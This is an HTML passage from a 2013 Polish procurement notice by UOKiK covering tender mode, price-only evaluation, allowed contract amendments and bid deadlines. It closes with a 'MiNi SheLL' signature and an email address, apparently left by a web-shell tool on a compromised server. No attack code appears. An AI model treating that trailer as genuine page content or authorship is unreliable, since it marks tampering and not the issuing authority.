<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonany zostanie wybór Wykonawcy.
Zmiany dotyczyć mogą następujących kwestii:
a) osoby uprawnionej do kontaktu lub podpisania protokołu odbioru ze strony          Zamawiającego lub Wykonawcy.
Zmiana dokonana zostanie w przypadku zaistnienia okoliczności faktycznie obiektywnych, które uniemożliwiać będą konkretnej osobie wskazanej w umowie do realizacji jej postanowień, np.: rozwiązanie umowy o pracę, choroba, śmierć pracownika, utrata uprawnień, itp.,
b)  pracowników Wykonawcy wykonujących bezpośrednio przedmiot zamówienia.
c) stawki podatku VAT, zgodnie z powszechnie obowiązującymi przepisami prawa                      z uwzględnieniem zmiany w całościowym wynagrodzeniu Wykonawcy.
Zmiana dokonana zostanie w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie rozliczeń podatkowych i obowiązujących stawek podatku VAT mających związek z niniejszym przedmiotem zamówienia,
Jeżeli w trakcie realizacji umowy Zamawiający lub Wykonawca dojdzie do wniosku, że              w celu właściwej realizacji zamówienia istnieje potrzeba dokonania przewidzianej przez Zamawiającego w SIWZ zmiany postanowień zawartej umowy w stosunku do treści wybranej oferty, to każda ze stron może się zwrócić do drugiej na piśmie z wnioskiem                    o dokonanie takiej zmiany.
Zmiany będą dokonywane na piśmie w postaci aneksu do zawartej umowy po uprzednim wyrażeniu zgody na zmianę przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Ochrony Konkurencji i Konsumentów
00 - 950 Warszawa, pl. Powstańców Warszawy 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 10:00, miejsce: Urząd Ochrony Konkurencji i Konsumentów
00 - 950 Warszawa, pl. Powstańców Warszawy 1
Kancelaria - pok 1.6. - Centrum Konferencyjno - Szkoleniowe.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com